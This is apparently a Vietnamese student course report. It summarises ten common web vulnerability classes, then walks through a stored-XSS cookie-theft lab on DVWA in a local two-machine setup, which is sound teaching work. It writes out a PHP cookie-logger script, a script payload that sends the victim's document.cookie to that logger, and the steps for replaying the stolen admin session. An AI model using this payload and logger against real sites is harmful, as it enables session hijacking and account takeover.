You are on page 1of 11

Mars Group An ninh mạng

ĐỀ TÀI : CÁC LỖI TẤN CÔNG WEB


Học phần : Cơ sở an ninh mạng

Nhóm Mar Group: 1. Nguyễn Quang Anh


2. Trần Duy Trường
3. Nguyễn Xuân Lực

1. Injection: Sai sót trong nhập liệu, chẳng hạn như SQL injection, OS injection hay
LDAP injection… Điều này xảy ra khi các thông tin sai lệch được đưa vào cùng
với các biến dữ liệu đầu vào như 1 phần của lệnh hay câu truy vấn. Kẻ tấn công có
thể lợi dụng sơ hở này để thực hiện các lệnh không mong muốn hay truy cập các
dữ liệu bất hợp pháp.

2. Broken Authentication and Session Management: Xác thực hay quản lý phiên
thiếu chính xác. Sơ hở này cho phép kẻ tấn công có thể lợi dụng để đạt được mật
khẩu, khóa hay phiên làm việc, từ đó mạo danh phiên làm việc và danh tính của
người dùng thông thường.

3. Cross-Site Scripting (XSS): Sai sót trong kiểm duyệt nội dung đầu vào cũng dẫn
đến rủi ro này. Các dữ liệu bất hợp pháp được gửi đến trình duyệt web mà ko cần
sự xác nhận thông thường. Nó cho phép kẻ tấn công thực thi các kịch bản trên
trình duyệt web của nạn nhân làm thay đổi nội dung trang web, chuyển hướng nạn
nhân hay đánh cắp phiên làm việc được lưu trên trình duyệt.

4. Insecure Direct Object References: Điều này xảy ra thì nhà phát triển cho thấy
có các tham chiếu trực tiếp đến một đối tượng nội bộ hay của người dùng khác, ví
dụ như một tập tin, thư mục, hay cơ sở dữ liệu quan trọng, mà ko có sự kiểm tra
hay bảo vệ an toàn cần thiết. Điều này cho phép kẻ tấn công có thể truy cập các tài
liệu này một cách trái phép.

5. Security Misconfiguration: Một hệ thống bảo mât tốt là hệ thống triển khai cho
khung ứng dụng, máy chủ ứng dụng, máy chủ cơ sở dữ liệu, nền tảng… các
phương phảp bảo mật cần thiết, thống nhất và liên kết với nhau. Điều này nhằm

Các lỗi tấn công WEB 1|Page


Mars Group An ninh mạng

tránh những nguy cơ bị khai thác vào ứng dụng, ví dụ để lộ ra những thông tin
quan trọng khi trao đổi các gói tin.

6. Sensitive Data Exposure: Các dữ liệu nhạy cảm không được lưu trữ và bảo vệ
cẩn thận, dẫn đến khi bị kẻ tấn công khai thác gây ra những ảnh hưởng to lớn cho
hệ thống máy chủ, doanh nghiệp, khách hàng. Ví dụ như việc lưu trữ thẻ tín dụng
mà ko thông qua các khâu mã hóa, hay các gói tin TLS bị bẻ khóa và nghe lén
thông qua lỗ hổng CRIME.

7. Missing Function Level Access Control: Thiếu các điều khoản trong việc phân
quyền quản trị các mức, dẫn đến việc kẻ tấn công có thể lợi dụng và truy ra các
điểm yếu trên hệ thống, hay lợi dụng để leo thang đặc quyền.

8. Cross-Site Request Forgery (CSRF): Lợi dụng sơ hở của nạn nhân, kẻ tấn công
có thể lừa nạn nhân thực hiện các hành động nguy hiểm mà nạn nhân không hề
hay biết, ví dụ như chuyển tiền từ tài khoản nạn nhân sáng tài khoản kẻ tấn công,
thông qua các lỗ hổng XSS.

9. Using Known Vulnerable Components: Sử dụng các thư viện, plugin, module…
có chứa các lỗ hổng đã được công khai, dễ dàng dẫn đến việc bị kẻ tấn công lợi
dụng để tấn công vào hệ thống một cách nhanh chóng.

10. Unvalidated Redirects and Forwards: Chuyển hướng không an toàn người dùng
đến một đường dẫn bên ngoài có thể bị kẻ tấn công lợi dụng để chuyển hướng nạn
nhân đến một trang đích được chuẩn bị sẵn của kẻ tấn công.

Các lỗi tấn công WEB 2|Page


Mars Group An ninh mạng

KỸ THUẬT TẤN CÔNG XSS – COOKIE

I. Cài đặt DVWA.


- Trước tiên, ta cần cài đặt phần mềm xampp hoặc wamp để giả lập 1 trang Web :
- Mở Xampp lên, click “start” ở dòng Apache và dòng MySQL
- Sau đó copy folder DVWA vào đường dẫn C:\xamp\htdocs\, sửa tên folder là “dvwa”
- Mở trình duyệt Web rồi nhập localhost/dvwa

- Sau đó, đăng nhập vào Website với Username: Admin, Password: Password
- Click vào DVWA Security chỉnh thành low  Submit

Các lỗi tấn công WEB 3|Page


Mars Group An ninh mạng

- Log out khỏi tài khoản Admin.

II. Tấn công XSS Stored


Chuẩn bị:
 Một máy windows 7 đóng vai trò chứa web lỗi. (win7sv)
 Một máy windows 7 khác đóng vai trò client để tấn công. (win7client)
Bước 1 : Tạo User cho Web dvwa trên máy win7sv
- Lấy User có sẵn đã tạo trên dvwa để đăng nhập (dùng làm User tấn công) :
o (Trong thực tế thì bạn cần truy cập vào trang Web cần tấn công và tạo User
người dùng bình thường để tấn công.)
o Vào localhost/phpmyAdmin -> dvwa -> Users -> copy đoạn Password đã
mã hóa sang mã md5 của 1 User nào đó

o Vào trang md5online.org để đổi mã md5 -> Password ở đây là “letmein”

Các lỗi tấn công WEB 4|Page


Mars Group An ninh mạng

o Vậy Username là “pablo”, Password là “letmein”


o Log out khỏi tài khoản Admin.
- Máy win7client : vào đường dẫn 192.168.1.1/dvwa/login.php -> đăng nhập vào tài
khoản trên

Bước 2 : Kiểm tra xem trang Web có lỗi XSS không ?


- Mở tab « XSS Stored »
o Dòng Name gõ ‘test’
o Dòng Message gõ đoạn mã ‘ <script>alert(‘’loi XSS‘’)</script> ‘
o Nhấn Sign Guesbook

Các lỗi tấn công WEB 5|Page


Mars Group An ninh mạng

o Nếu hiện lên bảng thông báo như hình dưới là trang Web có lỗi XSS.

- Mở tab Setup/reset Database để xóa dữ liệu của đoạn mã vừa nhập :


o Nhấn Create / Reset Database

Bước 3 : Tạo 2 file để upload lên host


- File log.txt : không có nội dung
- File cc.php : nội dung như sau :

<?php

function logData()

Các lỗi tấn công WEB 6|Page


Mars Group An ninh mạng

$ipLog="log.txt"; //lấy đường dẫn file log.txt

$cookie= $_SERVER['QUERY_STRING']; //lấy cookie


từ địa chỉ hiện tại

$log=fopen("$ipLog", "a+"); //mở file log

fputs($log, "COOKIE: $cookie \n\n"); // gán cookie vài


file log.txt

fclose($log); // đóng file log

logData();

?>.

- Sau đó đưa hai file lên website của mình, ở ví dụ này chúng ta sẽ tạo thêm thư
mục log nằm trong đường dẫn C://xampp/htdocs/ rồi bỏ file cc.php và log.txt vào
thư mục log.

Bước 4 : Chèn mã độc vào trang Web để đánh cắp cookie


<script>location.href=’http://192.168.1.1/dvwa/cc.php?
cookie=’+document.cookie;</script>

- Trên máy win7client:


o Mở trang 192.168.1.1/dvwa -> đăng nhập vào tài khoản người dùng (ở đây
User : pablo, Password : letmein )
o Mở tab XSS (stored) :
 Dòng Name gõ “hack”
 Dòng Message gõ đoạn mã trên vào
 Nhấn Sign Guesbook

Các lỗi tấn công WEB 7|Page


Mars Group An ninh mạng

Bước 5 : Đánh cắp cookie


- Dùng máy windows 7
o Truy cập host : localhost/dvwa/login.php để đăng nhập vào tài khoản
Admin ( ở đây User : Admin, Password : Password)

- Máy win7client
- Vào file log.txt để kiểm tra có cookie chưa bằng đường dẫn
192.168.1.1/dvwa/log.txt

o Copy cookie trong file log.txt, lưu sang file notepad

Bước 6 : Đăng nhập bằng cookie vừa lấy


- Máy win7client :
o Mở firefox : xóa cookie cũ
o Truy cập đường dẫn : 192.168.1.1/dvwa

Các lỗi tấn công WEB 8|Page


Mars Group An ninh mạng

o Mở adds-on “cookie manager (xem cách cài đặt cuối trang)” để paste
cookie đã đánh cắp vào, làm như hình bên dưới :

Các lỗi tấn công WEB 9|Page


Mars Group An ninh mạng

o Refresh lại trang, ta thấy trang Web đã tự động đăng nhập vào bằng User đã
đánh cắp là Admin.

Bổ sung : Cách add extension vào firefox


- Tải adds-on Cookie manager trên firefox :
o Mở menu -> nhấn adds-on -> nhấn See more adds-on !
o Tìm cookie manager trong ô Search
o Chọn Cookie manager -> nhấn Add to firefox

Các lỗi tấn công WEB 10 | P a g e


Mars Group An ninh mạng

Các lỗi tấn công WEB 11 | P a g e

You might also like